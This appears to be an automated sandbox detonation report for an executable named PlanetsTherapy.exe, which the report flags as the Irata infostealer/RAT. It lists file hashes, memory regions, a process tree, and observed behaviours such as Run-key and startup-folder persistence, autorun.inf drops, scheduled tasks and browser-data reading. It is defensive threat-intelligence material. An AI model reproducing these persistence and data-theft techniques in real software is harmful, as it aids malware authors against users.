C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 49ff766f7a0798bba894ec54f54febfa
SHA1 b25945df8e86382a41ddb111393e0b2a3d59479d
SHA256 16d9a27a5d8b011769ec647ee8a628280ee4592a481527940fdfb542df964ab1
SHA512 bbfa4f053b48a9f9dc84d6496e4a79bacb6d4fe12475ed68b95a69157a01d1bf4874af8b771025f52280227c18d4313f07123317df218d982dbf98b862270410

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\elevate.exe

MD5 253304114ade9d744a63ada8c558469e
SHA1 4ccac3074b24fe12d75b906b7f748299b9364624
SHA256 da5d64db428a5e494634a012d715c654d34f0e60df70fbfe4052d007bfdddad0
SHA512 3c4ef191e3404d7b32d66848605992d7953d62a211af9169b45765eab3b8059f72702b7c51339cfb04620a16fddb3aa7ffc2265999feafd8b227edbe575167a4

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\resources\app.asar

MD5 44350739db37b21f4e6ecfe95198620f
SHA1 20fade0d46a4f41ae9a7b25c37a67f1f0fd1bc8e
SHA256 02aae63bb88a5990c38c6bf9e33b9678010695c2984909c8723cc0cec2359a23
SHA512 92994be47626fded3c9022e4461bd4f760d38704ecda38d5760bbde4fc2b883bd619f3a09f31b3001133785203cd59a47161995cc9b47b874d78f4d406a8744e

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\swiftshader\libEGL.dll

MD5 b870728e95e1ff5d0fc07b71797d632d
SHA1 ab342eeed3820f2401a95fa35e2d095e49d3cf6e
SHA256 71724724b573a08e36ffc2c8955cd144a41e2c66e2fce0303bd470f83fe5f17d
SHA512 0718cfdbaabbdfa472d762aba2c182564c66c0b195534f5ab0b86f5b3915a9801db77edc673380f438dc8e839b9a64ea89b95886d4858002608067c3e9403049

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

MD5 d980b7ae3eee9966f223cdd7a7bd997a
SHA1 81aa0fe5df15ef0e9ad85cd0382ac8721a69edbd
SHA256 7def5c05bb7b6e4a77c5bdaae9a87a47fcc1918d2401b4d2d5ff4270743525c6
SHA512 f8ba422bf7d1fbc97dcc09a6f20ea20641ad01b81b1b9fda73171f925e57445abd0ed31fa743726033d842785fc890812fe32252f445c5978a4086277e977ea9

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

MD5 b35ff2c5a0851fe6f727f082fad0332f
SHA1 99d5747764e461b00e7b00af040e2aff50ac983f
SHA256 e6710375a13e6a2059b9702cdda2debf986be02b719c4e8d15d9a37b0ae1dfa8
SHA512 83b093942e674f5947c3b559991ecb099785140a93decb99c488bbcf8b1fe823d837619305babb640ffd93e2db03e3b7e3b0c6967a3488c093fdaafa36c00b14

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 abe1db2be89263c8445ef234b80763b2
SHA1 3bab857d6953a05386105489b508c231a26360b1
SHA256 bc5ed5cddcc1b46f91545e082d0c5524c5690c6f81f0036ceabac4641635b343
SHA512 19780ad9936678bd720b0cd96e8dc8cd6357a9a32ab9d14ae2b6e9bebeb83a416d55990e2607629fa5213349c30a3e67a8fdc60a589c1ede4ad2a18e8f45f80f

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 f2319f395417a029048362c5c2c6a6f3
SHA1 1de79dc1650be70b845d56664eed0e59bd11aa72
SHA256 53a9901ccefd73cdd0ea1546ff22a148c222baa014e68be036060172af19cb0f
SHA512 24eb9778854946f86c4c3fcc19dfea74b717e283526be145cb9cdd254347077a120d6edd2877cc062e5d90fe4997f4c479cd744b08e88c96a547fe1cfaca5a34

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\v8_context_snapshot.bin

MD5 f23f00e69b533c7dd96cb2e40e0d94b1
SHA1 14b8364bc0e8ed68c266d9f76b0039bf2c0d1b7f
SHA256 1794161a9c3130ecf44f9a09020c8b25da03325220a2a7f3b7ec0e57ee70285c
SHA512 21a9f2b392f9ea2a41889b15810745bb5b2763c4913d22d06ce4ca60da3a598bacab307e033eb36a356f0ae7f2b3da604dbf2b706335a919dde3c1d2e85929cf

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\icudtl.dat

MD5 c096ef19da2ae1b940df0cd9b3bc2d0b
SHA1 3d729e463cd303309d453a5493485ef94fa1c98a
SHA256 bae82184fe87df6ea91597ea8511a45591aa98eaaa670afcf1a4c5e0944e493a
SHA512 10cfbcc2b8385cd6246df0b67cafc3bfd3920654be99e7baf0eb4539c54ce8bba3d9006ba1a562f7b55653408d144b4fdd2371e4f978257ce98dab44cd94d230

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 e2844a4b89f952a876cea765113318d8
SHA1 ba9fcb6b8d9076addc5ead9f578b7f7e03b6bda9
SHA256 ec0473c2927d6c93a55fa7c99083a53cae44ff0712860bc6e53de13eacc82f1b
SHA512 c08ddd5101557646d1fc448b41960afc14cccbe46f6b2ac4fa46fe0bc8e6e00071b9aef78e149e4f86887067f17095de0627a0ce868b2ae091eaa35b28da6a72

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\resources\app.asar

MD5 cb3b8174449e5dd1ba402b2f6a133f40
SHA1 dce72d3337dab8e70a793a28133fa3efa7de1f3a
SHA256 2583e32805ea9f1761173579031bb97f624cd676562f699ab8221a59ebed371c
SHA512 0edf0a3ba6e713a0ebdfe35d753c89ea44a91d3e09fd6e0d0913308a5f87a2f8756e78a60f58dc2177a437d3893e881d048ba62cb97d2ba8f617faba56862597

\Users\Admin\AppData\Local\Temp\459ec94a-f1e2-4b2f-aa1a-81734d2c1651.tmp.node

MD5 fac7245a334780b514625f06f1a2e0d6
SHA1 bb8e0ed4742c3ccf98dbf838e0e320e211d9df9e
SHA256 d5e851f711b2bcc1f35c67804d1f16cbf5289c843623add67e08ab11559004fa
SHA512 84df6b072e70080861f4c8ef2e0b8601f6c969e9161b58cc9ce7db78cf01b80826f28dddaa357028fb49f314e966983f73da25fb62eee0b581aa123ee73c2dee

\Users\Admin\AppData\Local\Temp\27fea2d3-ffd0-4002-b77e-c2eba9c592a4.tmp.node

MD5 858895205a21048f118379efde8aeb25
SHA1 8db473c0cf61d86dd223829d061a3c5280d21990
SHA256 3874c83928754455b865a99e2ef864a07b3eadf4bd9671d0135cbe590f2d2e1c
SHA512 158863c332d87d876620bc098b2347bf6158ac8001699cde5ee99cb8ad7989040afca7acebbded6ce562df9f26f0fb2512a4a1b7b2b4436b2cbe36ea679b4424

memory/1140-580-0x0000000000060000-0x0000000000061000-memory.dmp

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

MD5 778b3763bf5233c17cf6e66570438925
SHA1 286e49607e13a5a60991961f050b00ed63f304b5
SHA256 b1f7951d664a403ebf7b0fa96d15bec5ecf60572a2b16916106d091092e0d7b9
SHA512 e535d96a3d682b6a41d862d888c2c0e1d28fcf67a05bb665655c98ec53d28074a48f429317aab852f809e794a0a2deb74f8a8804d799456d78c77705a5deaa8e

memory/1140-614-0x0000000077B90000-0x0000000077B91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 db82d1d3b6fff58e33dea74a239acd5c
SHA1 7c6a506384130b5313feae49c46314cbcdd99019
SHA256 edca658b67bac2adf8f84eaa164d6e16e2cc498ed8913b1a1890cd677b48e8de
SHA512 00f0c686d353b1ced2b35b76e0cf1679e21b8cb0840df4b41a41a0c694f80a8435a8c48092f261f516e2da3e41d1118743e2ee0bae6486db326d56e3fc1d7c95

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 f14ef34d31b8f747757e16b93e93693c
SHA1 8f1b9e54e2869575e356aceac6ec5c985edd3ac2
SHA256 2fc1faa936171f1eec4780069f21256973344c72100295b3781bd4628d55c6de
SHA512 55bc3e14de8d2a113ebfbc31adad5597e91731d55e5dc556c7fbd9033c533873a14b5846f7b52938519887eae760478d42ec71b578b6afa2e7b06bb9582ec1d7

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\resources.pak

MD5 2510081e852309aef999ec200b5b8c00
SHA1 6a9478cbbcfd3c832bab2a543eb83749529b5a28
SHA256 eb4b779cd3a393f72886f7833b9d79f97981d7e450e0e50ec3245726ee13a730
SHA512 2ff867182f7893c278bf8bb569079c3774ddafbc8dafcc935defb7dbb19ca5d3a54f4d8c5c3d87f87a50f233dcaea647ed57232b30362dc024f27de831508d15

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\locales\en-US.pak

MD5 0bb857860d8c9ab6d617cea5a5bd4d00
SHA1 351b744d95846bff2ce5f542fec2e87439aa0f8b
SHA256 5c56df9699fc7e8f09ec81421e50a6264cde055e822f5a8cd9bb1edb3066d816
SHA512 33fb73cffbb6781488cedbca4c92a7e4f66923a799beeb7f5cba58dbc23ba8f5130f63a7dac7114e3c3ef6f1df87884fbeb8858bc7604aec9449fdfd16c25078

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\chrome_200_percent.pak

MD5 bdf56587924b2496354d56cfcdb15a16
SHA1 6b113ced998d15dd3d4d00ed573c1d6e327211b0
SHA256 47b966f8ec59460f4ffcfeedb7e36f20fd4ec89462c2a46f690fcaed7b48a6c0
SHA512 4c4626f6e290e34f96cf5c50defffb5b4f7ad56283fd5fc254ca71ad473231f95dc8dcc85b6d020af680211a9a9b18e65b119a9f97449e71aa53bd20c9f9be3b

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 02fab95be4c7a8fccee35670c4910361
SHA1 f6167456f0ed0d1a8035fd2caa43aa78bb70e0e0
SHA256 c3138c37ede4ee0a90a1a798cbf3bb0d4befa1e9f16e5efcb84684bfecb6aeb4
SHA512 7f58c91d999d13188f7554d9fa59feb93e62d133b8451fc098ad2bad0640f2b2065e3d16d884612ced8fd67edc16d752a5be67626cd2aff41990923f34fdd658

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\D3DCompiler_47.dll

MD5 79b70530c5d8dbe26c13a7342c28777d
SHA1 bf1843d93ce333322da6a4a77e71ab521c0c7b17
SHA256 68b6443b52ba9d00efba9925ca9919868b938cb9a48b7bd88f3d390eab9549ef
SHA512 3b41c904c051815dbde1968cb0e94526b0996d505989ab8d4cf285697fcdd7597f2b728e23c0adbc2d2a4a08dd80ecb4ddaa5eb6c12d7f5b2dc4c479305b5336

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libEGL.dll

MD5 817e5dc2d00f547bc455f26485c19b90
SHA1 ba41168be58bd71ecbc7a46874bf68591dc3f08a
SHA256 5882ce39d8804f7451825706d88afb55e8acc0060d748f21d9d71e93fd573a72
SHA512 a1bf8fa4debbb6f691a26811ce452c02221993b854835c8cf0bba96cb8ec6fca0c0499fbac696b7506ba26c0fdd1c16a07e628ef002932bf6d645658428749ec

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libegl.dll

MD5 6d907e2eb034fd4dea2fb227d107ef43
SHA1 1f6f3e189315848cdd8deb95150ca877feccf6a1
SHA256 3d0ced4053b03799bca1d018168032ff6bbe266c5561f45df6bbc7267feca4fc
SHA512 9a8d7ee4d9dbd0e15f821b5f1426ef64a01f2b51e75bf4f6da977376af1316bab91e2defdee086dfb108585d3fb842f06ae1189b8c430ea07f30bc15f4589cd6

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libGLESv2.dll

MD5 bd5a3e1026247b53273c206f7a9291d8
SHA1 f0fad95546812bb7ada3964ee4fd0c8d8e3ab256
SHA256 444f0d53a9dda061ccb0ce197234e04362a03b60f6712b484d7d688ed8f389cd
SHA512 76c30db64c4a9990d5b5cc34026bedab51c3a327ff36db5c3918efcf9c19d19e31d5c800124bf80d3895d24c05bba40a26b9ab313289ef6687933e83602139c9

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libglesv2.dll

MD5 4113724e7344b1c9331c28e4ea153080
SHA1 9155e8b474779edbca62fc6e5758ac2f90c0912a
SHA256 bcfeb5ba907ab7cffd09644029f02e1ac065854b26e75a1f9ba02eb72607a019
SHA512 b31434a7dd43fa995bf8e723d6e836d9a07236520c9f214abcf500f2cd9b2c6393e60a7a2711e6c24f7698e99a8e92921e952517d410de60f837781f38cb20d2

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\d3dcompiler_47.dll

MD5 f738437b06d0b2c23ad33c91b782d259
SHA1 4bb9bb42d6d80b9412bdcf1fb2084b9314b6c358
SHA256 9b3d4fa1046483fe91d280294a30e3fa0ba11e2bd28b3f238e08f706086aa387
SHA512 0aee0ad4b58fe34f97b566f78ec6f75638df06c71d6872b64be2da6c010d23fd9daa7f2ce1e1103108a058b385d20d82a1888518473d1eee56946a6a6c783e20

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 e1eb691d47dc4572a3bdba1ba17c6153
SHA1 2e811de90545526cda3db9cc784a4c821cd71e98
SHA256 eebdacbfbfba67a9c300eaf86357639586fc736c1f95f8c30cf22aa4499de6a6
SHA512 652f96d3366953cc824552d50e5f730878dd242de51f5495052633de2981f0ebec5a8ec8057fca401e9839643ea7df9337ca5b39623167b7239ab74320d8c30c

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 46c8a363f08b8f5b5f7a671096cc93d2
SHA1 7325e5e2f271b4eae8b891981ec36400acc10752
SHA256 d5dd22e2c4f7a9c8c2f08939098e11651e63cdc9e92d6eec66a646de9cf4b6c4
SHA512 e9e2062ef30eb19d7310e07b9f34756ea3dcadbb6f9574654a338dae96662d497537765ef74c1a1add4986db12899adc0091b3220409ee8bed6aa88c1076c2c0

memory/2916-647-0x000000001B570000-0x000000001B852000-memory.dmp

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

MD5 e3beb528bc248f070c8540ddee39e03f
SHA1 2d7a21304b2c227662d5593926a398b9036a7ef5
SHA256 1101429d2c833eb4ffc03528d9ed3560f355baa0a3526926c30e5519d28d198c
SHA512 91e33b70c4cc294ff1a2dbdce0f045477abb90f9dfbea53096d2209ee2316820e88549bf0ea998d99993eb497b945a8b67db1565023ef5dd5a38c56aeb2dc1cf

memory/2916-656-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

MD5 7d61a53aa72ee55ba3cba206695213d1
SHA1 700f6aac3b89a505889202d68e99b99c2c92ad1f
SHA256 8b05aaf5f13c270309eed01bbfbe212edb48caf206199f676aee127adb9158ca
SHA512 7daec30450f23104ebf312079e34698e1507b545c4b88e2ce4b8ed381dde96749bad2bd51c2a99aea91c6f20220a45778a2e88746e979a06ddb509d3f869015a

memory/2916-662-0x000007FEF41F0000-0x000007FEF4B8D000-memory.dmp

memory/2916-666-0x000007FEF41F0000-0x000007FEF4B8D000-memory.dmp

memory/2916-668-0x0000000002BC0000-0x0000000002C40000-memory.dmp

memory/2916-670-0x0000000002BC0000-0x0000000002C40000-memory.dmp

memory/2916-674-0x0000000002BC0000-0x0000000002C40000-memory.dmp

memory/2916-664-0x0000000002BC0000-0x0000000002C40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vk_swiftshader.dll

MD5 4b94eb73028571fc1ea9038d3f1a239a
SHA1 8ec575bd330a94446cc21e23d272f3e2c37f0153
SHA256 61a42a4cd024ba68776064ff0a6b9160c2801b6fff6d849df0acd04a33b61667
SHA512 e05f68778f3e1a2aaad366eb945c769467b6d433fa759a732f40fd6b913c4403c8b2c5b2ec84d0196e375c40a51bf090408ed868c13dce9cf0e0952a5446c08c

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vulkan-1.dll

MD5 247254b4a5240af6651251864a9a2fba
SHA1 d5815b3476845f9b69ad926cfd2b07d74e876dc9
SHA256 e8aeff191bede625f4f2c2bd774bcc73bafa32faa904c256770a9f1d91d136f7
SHA512 be4b7ef7fd0b28a2bd51d07eb5178548de6766757ce3e815858f0eb929697f7cb7158ec08ba4c981b813a72928f8a4b77f136e5ce24de13bb0d63e8bd1eacda9

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vulkan-1.dll

MD5 581fb42c09b888550c4c846726f01f50
SHA1 0535567d457bd6b3d59a91dc28fd2bb226be5ce2
SHA256 a048f921cb5043e5d7c8a0eb1f390f0d5de554e76f0dbe72657b98181bfba50e
SHA512 a3e6f91227d127ba72cd80cb53b63fc277d94150d008cead5d33d395ea7a821342a5e3fee8eac416a85c10635dad2ed028adc544a34e0de036c88941f291ef73

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libEGL.dll

MD5 ba536a06b92a4900c4623dd1b82f1768
SHA1 3a791ba968eac9f82d86c4ba83ead24b5ff52613
SHA256 c3a66490202830eca95c7e2efa16c86bcb28fcb26182e69ab5c0df5360995d9e
SHA512 6ef341f8c32e2a84272c0deea529dcfc3f53da1611d3d837f7ff5a1d4d182ed27e1e0065fd800bb5055b851f396ecd7ab9503c816498e3ae8ad2a6d792dbcffd

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vk_swiftshader.dll

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\libGLESv2.dll

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\d3dcompiler_47.dll

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\ffmpeg.dll

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\vk_swiftshader.dll

Analysis: behavioral2

Detonation Overview

Submitted

2023-12-19 15:32

Reported

2023-12-19 15:37

Platform

win10v2004-20231215-en

Max time kernel

159s

Max time network

177s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupNBPdrq = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\PlanetsTherapy.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start_NBPdrq = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_NBPdrq.vbs" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Drops autorun.inf file

Description Indicator Process Target
File created F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5076 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 448 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 448 wrote to memory of 4812 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1528 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 4872 wrote to memory of 3668 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1528 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1528 wrote to memory of 812 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1528 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 812 wrote to memory of 4088 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2916 wrote to memory of 4508 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1528 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe"

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1716,12545588271907103077,18284286920533148989,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=5076 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=5076 get ExecutablePath

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1948 --field-trial-handle=1716,12545588271907103077,18284286920533148989,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

